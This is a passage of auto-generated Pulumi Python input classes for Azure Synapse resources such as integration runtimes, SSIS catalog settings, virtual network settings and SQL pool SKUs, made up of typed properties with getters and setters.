                 catalog_admin_user_name: Optional[pulumi.Input[str]] = None,
                 catalog_pricing_tier: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeSsisCatalogPricingTier']]] = None,
                 catalog_server_endpoint: Optional[pulumi.Input[str]] = None):
        """
        Catalog information for managed dedicated integration runtime.
        :param pulumi.Input['SecureStringArgs'] catalog_admin_password: The password of the administrator user account of the catalog database.
        :param pulumi.Input[str] catalog_admin_user_name: The administrator user name of catalog database.
        :param pulumi.Input[Union[str, 'IntegrationRuntimeSsisCatalogPricingTier']] catalog_pricing_tier: The pricing tier for the catalog database. The valid values could be found in https://azure.microsoft.com/en-us/pricing/details/sql-database/
        :param pulumi.Input[str] catalog_server_endpoint: The catalog database server URL.
        """
        # Only explicitly-provided (non-None) values are recorded.
        if catalog_admin_password is not None:
            pulumi.set(__self__, "catalog_admin_password", catalog_admin_password)
        if catalog_admin_user_name is not None:
            pulumi.set(__self__, "catalog_admin_user_name", catalog_admin_user_name)
        if catalog_pricing_tier is not None:
            pulumi.set(__self__, "catalog_pricing_tier", catalog_pricing_tier)
        if catalog_server_endpoint is not None:
            pulumi.set(__self__, "catalog_server_endpoint", catalog_server_endpoint)
    @property
    @pulumi.getter(name="catalogAdminPassword")
    def catalog_admin_password(self) -> Optional[pulumi.Input['SecureStringArgs']]:
        """
        The password of the administrator user account of the catalog database.
        """
        return pulumi.get(self, "catalog_admin_password")
    @catalog_admin_password.setter
    def catalog_admin_password(self, value: Optional[pulumi.Input['SecureStringArgs']]):
        pulumi.set(self, "catalog_admin_password", value)
    @property
    @pulumi.getter(name="catalogAdminUserName")
    def catalog_admin_user_name(self) -> Optional[pulumi.Input[str]]:
        """
        The administrator user name of catalog database.
        """
        return pulumi.get(self, "catalog_admin_user_name")
    @catalog_admin_user_name.setter
    def catalog_admin_user_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "catalog_admin_user_name", value)
    @property
    @pulumi.getter(name="catalogPricingTier")
    def catalog_pricing_tier(self) -> Optional[pulumi.Input[Union[str, 'IntegrationRuntimeSsisCatalogPricingTier']]]:
        """
        The pricing tier for the catalog database. The valid values could be found in https://azure.microsoft.com/en-us/pricing/details/sql-database/
        """
        return pulumi.get(self, "catalog_pricing_tier")
    @catalog_pricing_tier.setter
    def catalog_pricing_tier(self, value: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeSsisCatalogPricingTier']]]):
        pulumi.set(self, "catalog_pricing_tier", value)
    @property
    @pulumi.getter(name="catalogServerEndpoint")
    def catalog_server_endpoint(self) -> Optional[pulumi.Input[str]]:
        """
        The catalog database server URL.
        """
        return pulumi.get(self, "catalog_server_endpoint")
    @catalog_server_endpoint.setter
    def catalog_server_endpoint(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "catalog_server_endpoint", value)
@pulumi.input_type
class IntegrationRuntimeSsisPropertiesArgs:
    def __init__(__self__, *,
                 catalog_info: Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']] = None,
                 custom_setup_script_properties: Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']] = None,
                 data_proxy_properties: Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']] = None,
                 edition: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEdition']]] = None,
                 express_custom_setup_properties: Optional[pulumi.Input[Sequence[pulumi.Input[Union['CmdkeySetupArgs', 'ComponentSetupArgs', 'EnvironmentVariableSetupArgs']]]]] = None,
                 license_type: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeLicenseType']]] = None):
        """
        SSIS properties for a managed integration runtime.

        :param pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs'] catalog_info: Catalog information for the managed dedicated integration runtime.
        :param pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs'] custom_setup_script_properties: Custom setup script properties for the managed dedicated integration runtime.
        :param pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs'] data_proxy_properties: Data proxy properties for the managed dedicated integration runtime.
        :param pulumi.Input[Union[str, 'IntegrationRuntimeEdition']] edition: Edition of the SSIS Integration Runtime.
        :param pulumi.Input[Sequence[pulumi.Input[Union['CmdkeySetupArgs', 'ComponentSetupArgs', 'EnvironmentVariableSetupArgs']]]] express_custom_setup_properties: Custom setup (without a script) for the SSIS integration runtime.
        :param pulumi.Input[Union[str, 'IntegrationRuntimeLicenseType']] license_type: License type for the bring-your-own-license scenario.
        """
        # Record only the arguments the caller actually supplied.
        optional_props = (
            ("catalog_info", catalog_info),
            ("custom_setup_script_properties", custom_setup_script_properties),
            ("data_proxy_properties", data_proxy_properties),
            ("edition", edition),
            ("express_custom_setup_properties", express_custom_setup_properties),
            ("license_type", license_type),
        )
        for prop_name, prop_value in optional_props:
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter(name="catalogInfo")
    def catalog_info(self) -> Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']]:
        """Catalog information for the managed dedicated integration runtime."""
        return pulumi.get(self, "catalog_info")

    @catalog_info.setter
    def catalog_info(self, value: Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']]) -> None:
        pulumi.set(self, "catalog_info", value)

    @property
    @pulumi.getter(name="customSetupScriptProperties")
    def custom_setup_script_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']]:
        """Custom setup script properties for the managed dedicated integration runtime."""
        return pulumi.get(self, "custom_setup_script_properties")

    @custom_setup_script_properties.setter
    def custom_setup_script_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']]) -> None:
        pulumi.set(self, "custom_setup_script_properties", value)

    @property
    @pulumi.getter(name="dataProxyProperties")
    def data_proxy_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']]:
        """Data proxy properties for the managed dedicated integration runtime."""
        return pulumi.get(self, "data_proxy_properties")

    @data_proxy_properties.setter
    def data_proxy_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']]) -> None:
        pulumi.set(self, "data_proxy_properties", value)

    @property
    @pulumi.getter
    def edition(self) -> Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEdition']]]:
        """Edition of the SSIS Integration Runtime."""
        return pulumi.get(self, "edition")

    @edition.setter
    def edition(self, value: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEdition']]]) -> None:
        pulumi.set(self, "edition", value)

    @property
    @pulumi.getter(name="expressCustomSetupProperties")
    def express_custom_setup_properties(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Union['CmdkeySetupArgs', 'ComponentSetupArgs', 'EnvironmentVariableSetupArgs']]]]]:
        """Custom setup (without a script) for the SSIS integration runtime."""
        return pulumi.get(self, "express_custom_setup_properties")

    @express_custom_setup_properties.setter
    def express_custom_setup_properties(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[Union['CmdkeySetupArgs', 'ComponentSetupArgs', 'EnvironmentVariableSetupArgs']]]]]) -> None:
        pulumi.set(self, "express_custom_setup_properties", value)

    @property
    @pulumi.getter(name="licenseType")
    def license_type(self) -> Optional[pulumi.Input[Union[str, 'IntegrationRuntimeLicenseType']]]:
        """License type for the bring-your-own-license scenario."""
        return pulumi.get(self, "license_type")

    @license_type.setter
    def license_type(self, value: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeLicenseType']]]) -> None:
        pulumi.set(self, "license_type", value)
@pulumi.input_type
class IntegrationRuntimeVNetPropertiesArgs:
    def __init__(__self__, *,
                 public_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet: Optional[pulumi.Input[str]] = None,
                 v_net_id: Optional[pulumi.Input[str]] = None):
        """
        VNet properties for a managed integration runtime.

        :param pulumi.Input[Sequence[pulumi.Input[str]]] public_ips: Resource IDs of the public IP addresses this integration runtime will use.
        :param pulumi.Input[str] subnet: Name of the subnet this integration runtime will join.
        :param pulumi.Input[str] v_net_id: ID of the VNet this integration runtime will join.
        """
        # Record only the arguments the caller actually supplied.
        optional_props = (
            ("public_ips", public_ips),
            ("subnet", subnet),
            ("v_net_id", v_net_id),
        )
        for prop_name, prop_value in optional_props:
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter(name="publicIPs")
    def public_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """Resource IDs of the public IP addresses this integration runtime will use."""
        return pulumi.get(self, "public_ips")

    @public_ips.setter
    def public_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]) -> None:
        pulumi.set(self, "public_ips", value)

    @property
    @pulumi.getter
    def subnet(self) -> Optional[pulumi.Input[str]]:
        """Name of the subnet this integration runtime will join."""
        return pulumi.get(self, "subnet")

    @subnet.setter
    def subnet(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "subnet", value)

    @property
    @pulumi.getter(name="vNetId")
    def v_net_id(self) -> Optional[pulumi.Input[str]]:
        """ID of the VNet this integration runtime will join."""
        return pulumi.get(self, "v_net_id")

    @v_net_id.setter
    def v_net_id(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "v_net_id", value)
@pulumi.input_type
class LibraryInfoArgs:
    def __init__(__self__, *,
                 container_name: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 path: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None,
                 uploaded_timestamp: Optional[pulumi.Input[str]] = None):
        """
        Library/package information of a Big Data pool powered by Apache Spark.

        :param pulumi.Input[str] container_name: Storage blob container name.
        :param pulumi.Input[str] name: Name of the library.
        :param pulumi.Input[str] path: Storage blob path of the library.
        :param pulumi.Input[str] type: Type of the library.
        :param pulumi.Input[str] uploaded_timestamp: Time the library was last updated.
        """
        # Record only the arguments the caller actually supplied.
        optional_props = (
            ("container_name", container_name),
            ("name", name),
            ("path", path),
            ("type", type),
            ("uploaded_timestamp", uploaded_timestamp),
        )
        for prop_name, prop_value in optional_props:
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter(name="containerName")
    def container_name(self) -> Optional[pulumi.Input[str]]:
        """Storage blob container name."""
        return pulumi.get(self, "container_name")

    @container_name.setter
    def container_name(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "container_name", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """Name of the library."""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def path(self) -> Optional[pulumi.Input[str]]:
        """Storage blob path of the library."""
        return pulumi.get(self, "path")

    @path.setter
    def path(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "path", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """Type of the library."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter(name="uploadedTimestamp")
    def uploaded_timestamp(self) -> Optional[pulumi.Input[str]]:
        """Time the library was last updated."""
        return pulumi.get(self, "uploaded_timestamp")

    @uploaded_timestamp.setter
    def uploaded_timestamp(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "uploaded_timestamp", value)
@pulumi.input_type
class LibraryRequirementsArgs:
    def __init__(__self__, *,
                 content: Optional[pulumi.Input[str]] = None,
                 filename: Optional[pulumi.Input[str]] = None):
        """
        Library requirements for a Big Data pool powered by Apache Spark.

        :param pulumi.Input[str] content: The library requirements.
        :param pulumi.Input[str] filename: Filename of the library requirements file.
        """
        # Record only the arguments the caller actually supplied.
        for prop_name, prop_value in (("content", content), ("filename", filename)):
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def content(self) -> Optional[pulumi.Input[str]]:
        """The library requirements."""
        return pulumi.get(self, "content")

    @content.setter
    def content(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "content", value)

    @property
    @pulumi.getter
    def filename(self) -> Optional[pulumi.Input[str]]:
        """Filename of the library requirements file."""
        return pulumi.get(self, "filename")

    @filename.setter
    def filename(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "filename", value)
@pulumi.input_type
class LinkedIntegrationRuntimeKeyAuthorizationArgs:
    def __init__(__self__, *,
                 authorization_type: pulumi.Input[str],
                 key: pulumi.Input['SecureStringArgs']):
        """
        The key authorization type integration runtime.

        :param pulumi.Input[str] authorization_type: Authorization type for integration runtime sharing.
               Expected value is 'Key'.
        :param pulumi.Input['SecureStringArgs'] key: The key used for authorization.
        """
        # The discriminator is fixed for this type: 'Key' is always stored,
        # regardless of the ``authorization_type`` argument's value.
        pulumi.set(__self__, "authorization_type", 'Key')
        pulumi.set(__self__, "key", key)

    @property
    @pulumi.getter(name="authorizationType")
    def authorization_type(self) -> pulumi.Input[str]:
        """
        Authorization type for integration runtime sharing.
        Expected value is 'Key'.
        """
        return pulumi.get(self, "authorization_type")

    @authorization_type.setter
    def authorization_type(self, value: pulumi.Input[str]) -> None:
        pulumi.set(self, "authorization_type", value)

    @property
    @pulumi.getter
    def key(self) -> pulumi.Input['SecureStringArgs']:
        """The key used for authorization."""
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: pulumi.Input['SecureStringArgs']) -> None:
        pulumi.set(self, "key", value)
@pulumi.input_type
class LinkedIntegrationRuntimeRbacAuthorizationArgs:
    def __init__(__self__, *,
                 authorization_type: pulumi.Input[str],
                 resource_id: pulumi.Input[str]):
        """
        The role based access control (RBAC) authorization type integration runtime.

        :param pulumi.Input[str] authorization_type: Authorization type for integration runtime sharing.
               Expected value is 'RBAC'.
        :param pulumi.Input[str] resource_id: Resource identifier of the integration runtime to be shared.
        """
        # The discriminator is fixed for this type: 'RBAC' is always stored,
        # regardless of the ``authorization_type`` argument's value.
        pulumi.set(__self__, "authorization_type", 'RBAC')
        pulumi.set(__self__, "resource_id", resource_id)

    @property
    @pulumi.getter(name="authorizationType")
    def authorization_type(self) -> pulumi.Input[str]:
        """
        Authorization type for integration runtime sharing.
        Expected value is 'RBAC'.
        """
        return pulumi.get(self, "authorization_type")

    @authorization_type.setter
    def authorization_type(self, value: pulumi.Input[str]) -> None:
        pulumi.set(self, "authorization_type", value)

    @property
    @pulumi.getter(name="resourceId")
    def resource_id(self) -> pulumi.Input[str]:
        """Resource identifier of the integration runtime to be shared."""
        return pulumi.get(self, "resource_id")

    @resource_id.setter
    def resource_id(self, value: pulumi.Input[str]) -> None:
        pulumi.set(self, "resource_id", value)
@pulumi.input_type
class ManagedIdentityArgs:
    def __init__(__self__, *,
                 type: Optional[pulumi.Input['ResourceIdentityType']] = None):
        """
        The workspace managed identity.

        :param pulumi.Input['ResourceIdentityType'] type: Type of managed identity for the workspace.
        """
        # Record the identity type only when explicitly supplied.
        if type is None:
            return
        pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:
        """Type of managed identity for the workspace."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input['ResourceIdentityType']]) -> None:
        pulumi.set(self, "type", value)
@pulumi.input_type
class ManagedIntegrationRuntimeArgs:
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 compute_properties: Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 managed_virtual_network: Optional[pulumi.Input['ManagedVirtualNetworkReferenceArgs']] = None,
                 ssis_properties: Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']] = None):
        """
        Managed integration runtime, covering managed elastic and managed dedicated integration runtimes.

        :param pulumi.Input[str] type: Type of integration runtime.
               Expected value is 'Managed'.
        :param pulumi.Input['IntegrationRuntimeComputePropertiesArgs'] compute_properties: Compute resource for the managed integration runtime.
        :param pulumi.Input[str] description: Integration runtime description.
        :param pulumi.Input['ManagedVirtualNetworkReferenceArgs'] managed_virtual_network: Managed Virtual Network reference.
        :param pulumi.Input['IntegrationRuntimeSsisPropertiesArgs'] ssis_properties: SSIS properties for the managed integration runtime.
        """
        # The discriminator is fixed for this type: 'Managed' is always stored,
        # regardless of the ``type`` argument's value.
        pulumi.set(__self__, "type", 'Managed')
        # Record only the optional arguments the caller actually supplied.
        optional_props = (
            ("compute_properties", compute_properties),
            ("description", description),
            ("managed_virtual_network", managed_virtual_network),
            ("ssis_properties", ssis_properties),
        )
        for prop_name, prop_value in optional_props:
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        Type of integration runtime.
        Expected value is 'Managed'.
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]) -> None:
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter(name="computeProperties")
    def compute_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']]:
        """Compute resource for the managed integration runtime."""
        return pulumi.get(self, "compute_properties")

    @compute_properties.setter
    def compute_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']]) -> None:
        pulumi.set(self, "compute_properties", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """Integration runtime description."""
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="managedVirtualNetwork")
    def managed_virtual_network(self) -> Optional[pulumi.Input['ManagedVirtualNetworkReferenceArgs']]:
        """Managed Virtual Network reference."""
        return pulumi.get(self, "managed_virtual_network")

    @managed_virtual_network.setter
    def managed_virtual_network(self, value: Optional[pulumi.Input['ManagedVirtualNetworkReferenceArgs']]) -> None:
        pulumi.set(self, "managed_virtual_network", value)

    @property
    @pulumi.getter(name="ssisProperties")
    def ssis_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']]:
        """SSIS properties for the managed integration runtime."""
        return pulumi.get(self, "ssis_properties")

    @ssis_properties.setter
    def ssis_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']]) -> None:
        pulumi.set(self, "ssis_properties", value)
@pulumi.input_type
class ManagedVirtualNetworkReferenceArgs:
    def __init__(__self__, *,
                 reference_name: pulumi.Input[str],
                 type: pulumi.Input[str]):
        """
        Managed Virtual Network reference type.

        :param pulumi.Input[str] reference_name: Name of the referenced ManagedVirtualNetwork.
        :param pulumi.Input[str] type: Managed Virtual Network reference type.
        """
        # Both fields are required and stored unconditionally.
        pulumi.set(__self__, "reference_name", reference_name)
        pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter(name="referenceName")
    def reference_name(self) -> pulumi.Input[str]:
        """Name of the referenced ManagedVirtualNetwork."""
        return pulumi.get(self, "reference_name")

    @reference_name.setter
    def reference_name(self, value: pulumi.Input[str]) -> None:
        pulumi.set(self, "reference_name", value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """Managed Virtual Network reference type."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]) -> None:
        pulumi.set(self, "type", value)
@pulumi.input_type
class ManagedVirtualNetworkSettingsArgs:
    def __init__(__self__, *,
                 allowed_aad_tenant_ids_for_linking: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 linked_access_check_on_target_resource: Optional[pulumi.Input[bool]] = None,
                 prevent_data_exfiltration: Optional[pulumi.Input[bool]] = None):
        """
        Managed Virtual Network Settings.

        :param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_aad_tenant_ids_for_linking: Allowed Aad Tenant Ids For Linking
        :param pulumi.Input[bool] linked_access_check_on_target_resource: Linked Access Check On Target Resource
        :param pulumi.Input[bool] prevent_data_exfiltration: Prevent Data Exfiltration
        """
        # Record only the arguments the caller actually supplied.
        optional_props = (
            ("allowed_aad_tenant_ids_for_linking", allowed_aad_tenant_ids_for_linking),
            ("linked_access_check_on_target_resource", linked_access_check_on_target_resource),
            ("prevent_data_exfiltration", prevent_data_exfiltration),
        )
        for prop_name, prop_value in optional_props:
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter(name="allowedAadTenantIdsForLinking")
    def allowed_aad_tenant_ids_for_linking(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """Allowed Aad Tenant Ids For Linking"""
        return pulumi.get(self, "allowed_aad_tenant_ids_for_linking")

    @allowed_aad_tenant_ids_for_linking.setter
    def allowed_aad_tenant_ids_for_linking(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]) -> None:
        pulumi.set(self, "allowed_aad_tenant_ids_for_linking", value)

    @property
    @pulumi.getter(name="linkedAccessCheckOnTargetResource")
    def linked_access_check_on_target_resource(self) -> Optional[pulumi.Input[bool]]:
        """Linked Access Check On Target Resource"""
        return pulumi.get(self, "linked_access_check_on_target_resource")

    @linked_access_check_on_target_resource.setter
    def linked_access_check_on_target_resource(self, value: Optional[pulumi.Input[bool]]) -> None:
        pulumi.set(self, "linked_access_check_on_target_resource", value)

    @property
    @pulumi.getter(name="preventDataExfiltration")
    def prevent_data_exfiltration(self) -> Optional[pulumi.Input[bool]]:
        """Prevent Data Exfiltration"""
        return pulumi.get(self, "prevent_data_exfiltration")

    @prevent_data_exfiltration.setter
    def prevent_data_exfiltration(self, value: Optional[pulumi.Input[bool]]) -> None:
        pulumi.set(self, "prevent_data_exfiltration", value)
@pulumi.input_type
class PrivateEndpointConnectionArgs:
    def __init__(__self__, *,
                 private_link_service_connection_state: Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']] = None):
        """
        A private endpoint connection.

        :param pulumi.Input['PrivateLinkServiceConnectionStateArgs'] private_link_service_connection_state: Connection state of the private endpoint connection.
        """
        # Record the connection state only when explicitly supplied.
        if private_link_service_connection_state is None:
            return
        pulumi.set(__self__, "private_link_service_connection_state", private_link_service_connection_state)

    @property
    @pulumi.getter(name="privateLinkServiceConnectionState")
    def private_link_service_connection_state(self) -> Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']]:
        """Connection state of the private endpoint connection."""
        return pulumi.get(self, "private_link_service_connection_state")

    @private_link_service_connection_state.setter
    def private_link_service_connection_state(self, value: Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']]) -> None:
        pulumi.set(self, "private_link_service_connection_state", value)
@pulumi.input_type
class PrivateLinkServiceConnectionStateArgs:
    def __init__(__self__, *,
                 description: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None):
        """
        Connection state details of the private endpoint.

        :param pulumi.Input[str] description: The private link service connection description.
        :param pulumi.Input[str] status: The private link service connection status.
        """
        # Record only the arguments the caller actually supplied.
        for prop_name, prop_value in (("description", description), ("status", status)):
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """The private link service connection description."""
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        """The private link service connection status."""
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "status", value)
@pulumi.input_type
class PurviewConfigurationArgs:
    def __init__(__self__, *,
                 purview_resource_id: Optional[pulumi.Input[str]] = None):
        """
        Purview Configuration.

        :param pulumi.Input[str] purview_resource_id: Purview Resource ID
        """
        # Record the resource ID only when explicitly supplied.
        if purview_resource_id is None:
            return
        pulumi.set(__self__, "purview_resource_id", purview_resource_id)

    @property
    @pulumi.getter(name="purviewResourceId")
    def purview_resource_id(self) -> Optional[pulumi.Input[str]]:
        """Purview Resource ID"""
        return pulumi.get(self, "purview_resource_id")

    @purview_resource_id.setter
    def purview_resource_id(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "purview_resource_id", value)
@pulumi.input_type
class SecureStringArgs:
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 value: pulumi.Input[str]):
        """
        Azure Synapse secure string definition. The string value will be masked with asterisks '*' during Get or List API calls.

        :param pulumi.Input[str] type: Type of the secret.
               Expected value is 'SecureString'.
        :param pulumi.Input[str] value: Value of secure string.
        """
        # The discriminator is fixed for this type: 'SecureString' is always
        # stored, regardless of the ``type`` argument's value.
        pulumi.set(__self__, "type", 'SecureString')
        pulumi.set(__self__, "value", value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        Type of the secret.
        Expected value is 'SecureString'.
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]) -> None:
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def value(self) -> pulumi.Input[str]:
        """Value of secure string."""
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: pulumi.Input[str]) -> None:
        pulumi.set(self, "value", value)
@pulumi.input_type
class SelfHostedIntegrationRuntimeArgs:
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 description: Optional[pulumi.Input[str]] = None,
                 linked_info: Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyAuthorizationArgs', 'LinkedIntegrationRuntimeRbacAuthorizationArgs']]] = None):
        """
        Self-hosted integration runtime.

        :param pulumi.Input[str] type: Type of integration runtime.
               Expected value is 'SelfHosted'.
        :param pulumi.Input[str] description: Integration runtime description.
        :param pulumi.Input[Union['LinkedIntegrationRuntimeKeyAuthorizationArgs', 'LinkedIntegrationRuntimeRbacAuthorizationArgs']] linked_info: Linked integration runtime type from data factory
        """
        # The discriminator is fixed for this type: 'SelfHosted' is always
        # stored, regardless of the ``type`` argument's value.
        pulumi.set(__self__, "type", 'SelfHosted')
        # Record only the optional arguments the caller actually supplied.
        for prop_name, prop_value in (("description", description), ("linked_info", linked_info)):
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        Type of integration runtime.
        Expected value is 'SelfHosted'.
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]) -> None:
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """Integration runtime description."""
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="linkedInfo")
    def linked_info(self) -> Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyAuthorizationArgs', 'LinkedIntegrationRuntimeRbacAuthorizationArgs']]]:
        """Linked integration runtime type from data factory"""
        return pulumi.get(self, "linked_info")

    @linked_info.setter
    def linked_info(self, value: Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyAuthorizationArgs', 'LinkedIntegrationRuntimeRbacAuthorizationArgs']]]) -> None:
        pulumi.set(self, "linked_info", value)
@pulumi.input_type
class SkuArgs:
    def __init__(__self__, *,
                 capacity: Optional[pulumi.Input[int]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 tier: Optional[pulumi.Input[str]] = None):
        """
        SQL pool SKU.

        :param pulumi.Input[int] capacity: If the SKU supports scale out/in then the capacity integer should be included. If scale out/in is not possible for the resource this may be omitted.
        :param pulumi.Input[str] name: The SKU name
        :param pulumi.Input[str] tier: The service tier
        """
        # Record only the arguments the caller actually supplied.
        optional_props = (
            ("capacity", capacity),
            ("name", name),
            ("tier", tier),
        )
        for prop_name, prop_value in optional_props:
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def capacity(self) -> Optional[pulumi.Input[int]]:
        """If the SKU supports scale out/in then the capacity integer should be included. If scale out/in is not possible for the resource this may be omitted."""
        return pulumi.get(self, "capacity")

    @capacity.setter
    def capacity(self, value: Optional[pulumi.Input[int]]) -> None:
        pulumi.set(self, "capacity", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """The SKU name"""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def tier(self) -> Optional[pulumi.Input[str]]:
        """The service tier"""
        return pulumi.get(self, "tier")

    @tier.setter
    def tier(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "tier", value)
@pulumi.input_type
class SqlPoolVulnerabilityAssessmentRuleBaselineItemArgs:
    def __init__(__self__, *,
                 result: pulumi.Input[Sequence[pulumi.Input[str]]]):
        """
        Properties for an Sql pool vulnerability assessment rule baseline's result.

        :param pulumi.Input[Sequence[pulumi.Input[str]]] result: The rule baseline result
        """
        # The result is required and stored unconditionally.
        pulumi.set(__self__, "result", result)

    @property
    @pulumi.getter
    def result(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """The rule baseline result"""
        return pulumi.get(self, "result")

    @result.setter
    def result(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]) -> None:
        pulumi.set(self, "result", value)
@pulumi.input_type
class VirtualNetworkProfileArgs:
    def __init__(__self__, *,
                 compute_subnet_id: Optional[pulumi.Input[str]] = None):
        """
        Virtual Network Profile.

        :param pulumi.Input[str] compute_subnet_id: Subnet ID used for computes in workspace
        """
        # Record the subnet ID only when explicitly supplied.
